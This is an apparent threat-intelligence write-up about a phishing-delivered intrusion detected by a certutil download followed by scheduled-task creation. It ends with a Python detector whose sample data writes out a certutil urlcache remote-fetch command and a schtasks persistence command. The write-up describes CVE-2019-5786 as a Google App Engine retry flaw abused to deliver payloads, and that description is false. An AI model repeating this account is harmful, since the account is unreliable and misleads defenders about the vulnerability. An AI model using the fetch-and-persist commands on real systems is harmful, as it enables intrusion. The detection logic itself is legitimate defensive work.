On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic - a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation - but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently announced vulnerability as well as to a long-running post-exploitation framework linked to prominent ransomware groups.
Specifically, the event was triggered by a certutil command delivered through a spear-phishing email sent to an organization in the healthcare industry. Within the command, a seemingly regular domain request was made:
https://www.google.com/nav?cb=1&q=www.google.com&vl=en-US
This request, however, was launched through a known vulnerability (CVE-2019-5786) in the delivery of Chrome extensions via Google App Engine (GAE). The core of this vulnerability is that GAE retries failed requests by default, a behaviour the attackers abused to attempt delivery of payloads from another domain.
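The alert described at the top of this page pairs a certutil urlcache download with a follow-on scheduled task creation. As an added example (not Huntress's rule or code), the following Python correlates those two behaviours over constructed process-creation records; the record fields (ts, host, parent, cmd) and the 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation records (simplified EDR/Sysmon-style fields, not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2023-02-02T14:01:05", "host": "WS01", "parent": "outlook.exe",
     "cmd": "certutil.exe -urlcache -split -f https://www.google.com/nav?cb=1&q=www.google.com&vl=en-US C:\\Users\\Public\\nav.dat"},
    {"ts": "2023-02-02T14:01:40", "host": "WS01", "parent": "cmd.exe",
     "cmd": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\nav.dat /sc minute /mo 15"},
    # Benign admin activity: task creation with no preceding download on that host.
    {"ts": "2023-02-02T09:12:00", "host": "WS02", "parent": "explorer.exe",
     "cmd": "schtasks.exe /create /tn Backup /tr C:\\Tools\\backup.cmd /sc daily"},
    # certutil used legitimately for hashing, no urlcache flag.
    {"ts": "2023-02-02T10:00:00", "host": "WS03", "parent": "cmd.exe",
     "cmd": "certutil.exe -hashfile C:\\Tools\\installer.msi SHA256"},
]

# certutil invoked with the urlcache flag (remote retrieval), and schtasks creating a task.
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\b.*-urlcache\b", re.IGNORECASE)
SCHTASK_CREATE = re.compile(r"schtasks(\.exe)?\b.*/create\b", re.IGNORECASE)


def correlate(events, window_minutes=30):
    """Return one alert per certutil urlcache download that is followed, on the same
    host and within window_minutes, by a scheduled-task creation."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    window = timedelta(minutes=window_minutes)
    alerts = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if not CERTUTIL_FETCH.search(ev["cmd"]):
                continue
            t0 = datetime.fromisoformat(ev["ts"])
            for later in evs[i + 1:]:
                t1 = datetime.fromisoformat(later["ts"])
                if t1 - t0 > window:
                    break  # events are time-sorted, so nothing later can fall in the window
                if SCHTASK_CREATE.search(later["cmd"]):
                    alerts.append({"host": host, "fetch": ev["cmd"], "task": later["cmd"],
                                   "seconds_apart": int((t1 - t0).total_seconds())})
                    break
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"[{a['host']}] certutil download followed by task creation {a['seconds_apart']}s later")
```

Only WS01 fires: the lone task creation on WS02 and the hashing use of certutil on WS03 do not satisfy the two-stage pattern.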
Source: Investigating Intrusions From Intriguing Exploits - AlienVault - Open Threat Exchange